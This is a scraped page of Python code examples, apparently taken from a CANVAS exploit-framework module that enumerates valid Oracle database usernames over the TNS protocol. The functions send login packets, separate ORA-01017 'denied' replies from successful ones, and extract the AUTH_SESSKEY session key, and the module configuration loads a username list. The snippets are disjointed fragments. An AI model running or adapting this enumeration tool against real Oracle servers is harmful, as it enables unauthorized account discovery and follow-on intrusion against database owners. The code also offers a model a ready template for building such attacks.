Exemple #1
0
    def setupSession(self, s):
        tnsdata = tnslib.TNSDATA()

        #send SNS packet
        tnsdata.SNS(self.version)
        snspkt = tnsdata.getData()
        TNS.sendDataRequest(s, snspkt)
        if (TNS.recvTNSPkt(s) == 0):
            self.log("Problem with response to SNS packet")
            return 0

        #WINNT request
        tnsdata.WINNT()
        winntpkt = tnsdata.getData()
        TNS.sendDataRequest(s, winntpkt)
        if (TNS.recvTNSPkt(s) == 0):
            self.log("Problem with response to WINNT packet")
            return 0

        #<<< request
        tnsdata.LESS(self.version)
        lesspkt = tnsdata.getData()
        TNS.sendDataRequest(s, lesspkt)
        if (TNS.recvTNSPkt(s) == 0):
            return 0
        return 1
Exemple #2
0
    def tryUsername(self, s, uname):
        tnsdata = tnslib.TNSDATA()

        #self.log("Trying %s"%uname)

        #loginpkt = tnsdata.getLogin(uname,self.version)
        if ((self.version == TNS.TNS_V9) or (self.version == TNS.TNS_V10)):
            tnsdata.LOGINv2(uname, self.version)
        else:
            tnsdata.LOGINv1(uname, self.version)
        loginpkt = tnsdata.getData()

        TNS.sendDataRequest(s, loginpkt)
        if (TNS.recvTNSPkt(s) == 0):
            self.log("Error receiving response to auth request")
            return 0

        if (TNS.packet_type == TNS.TNS_TYPE_DATA):
            tnsdata.parseDataLayer(TNS.tns_data)
            #self.log("Testing Success, data type is %d"%tnsdata.type)
            if (tnsdata.type == tnsdata.TNS_DATA_TYPE_EIGHT):
                return 1
        elif (TNS.packet_type == TNS.TNS_TYPE_MARKER):
            self.doMarkers(s)
        else:
            self.log("Recvd unexpected TNS_DATA type")
        return 0
Exemple #3
0
 def processFail(self):
     tnsdata = tnslib.TNSDATA()
     tnsdata.parseDataLayer(TNS.tns_data)
     if not (tnsdata.type == tnsdata.TNS_DATA_TYPE_FOUR):
         self.log("Unexpected password fail response - expecting type 4")
         return 0
     if not (tnsdata.data.count("ORA-01017")
             or tnsdata.data.count("denied")):
         self.log(
             "Unexpected password fail response - expecting denied string")
         return 0
     return 1
Exemple #4
0
 def pwdRequest(self, s, encpwd):
     tnsdata = tnslib.TNSDATA()
     if ((self.version == TNS.TNS_V9) or (self.version == TNS.TNS_V10)):
         tnsdata.PWDv2(self.version, self.user, encpwd)
     else:
         tnsdata.PWDv1(self.version, self.user, encpwd)
     pwdpkt = tnsdata.getData()
     #print "pwdpkt: %s"%hexprint(pwdpkt)
     TNS.sendDataRequest(s, pwdpkt)
     if (TNS.recvTNSPkt(s) == 0):
         self.log("Error receiving response to password packet")
         return 0
     return 1
Exemple #5
0
 def testSuccess(self):
     if not (TNS.packet_type == TNS.TNS_TYPE_DATA):
         return 0
     tnsdata = tnslib.TNSDATA()
     #print ("parsing %s"%hexprint(TNS.tns_data))
     tnsdata.parseDataLayer(TNS.tns_data)
     #self.log("Testing Success, data type is %d"%tnsdata.type)
     if (tnsdata.type == tnsdata.TNS_DATA_TYPE_EIGHT):
         return 1
     if (tnsdata.type == tnsdata.TNS_DATA_TYPE_FOUR):
         if tnsdata.data.count("ORA-01017") or tnsdata.data.count("denied"):
             return 0
         else:
             return 1
     return 0
Exemple #6
0
 def authRequest(self, s):
     tnsdata = tnslib.TNSDATA()
     #login request
     if ((self.version == TNS.TNS_V9) or (self.version == TNS.TNS_V10)):
         tnsdata.LOGINv2(self.user, self.version)
     else:
         tnsdata.LOGINv1(self.user, self.version)
     loginpkt = tnsdata.getData()
     TNS.sendDataRequest(s, loginpkt)
     if (TNS.recvTNSPkt(s) == 0):
         self.log("Error receiving response to auth request")
         return 0
     if (TNS.packet_type != TNS.TNS_TYPE_DATA):
         self.log(
             "Did not receive expected TNS_TYPE_DATA in response to auth request - bad username?"
         )
         return (0)
     return 1
Exemple #7
0
    def getEncryptedSessionkey(self):
        tnsdata = tnslib.TNSDATA()
        #print "%s"%hexprint(TNS.tns_data)
        tnsdata.parseDataLayer(TNS.tns_data)
        #print "%d %d %s"%(tnsdata.data_flag,tnsdata.type,hexprint(tnsdata.data))
        #print "%s"%hexprint(tnsdata.data[0])

        b = struct.unpack("B", tnsdata.data[0])[0]
        if (
                b == 1
        ):  #format of response if we're doing the long (v1) version of auth/pwd packets
            keyloc = tnsdata.data.find("AUTH_SESSKEY")
            #print "keyloc:%s"% keyloc
            if (keyloc > 0):
                keyloc = keyloc + 17  #ideally we'd parse out the data packet contents properly, if we had any clue what their format is supposed to be
            else:
                self.log("Key not found..?")
                return (0)
        else:  #doing short version
            keyloc = 3

        end = keyloc + 16
        return (tnsdata.data[keyloc:end])
Exemple #8
0
PROPERTY['ARCH'] = [["Windows"], ["Linux"], ["Solaris"]]
PROPERTY['TYPE'] = "Tool"

NOTES = """
Attempt to identify Oracle usernames   
"""

CHANGELOG = """
"""

# GUI run exploit
runAnExploit_gtk2 = canvasengine.runAnExploit_gtk2
runExploit = canvasengine.runExploit

TNS = tnslib.TNS()
tnsdata = tnslib.TNSDATA()


class theexploit(tcpexploit):
    def __init__(self):
        tcpexploit.__init__(self)
        self.setInfo(DESCRIPTION)
        self.host = "vmware.local"
        self.port = 1521
        self.covertness = 0
        self.ssl = 0
        self.done = 0
        self.version = 1
        self.dbasenames = []
        self.version = 0
        self.defaultfile = "oracleusernames"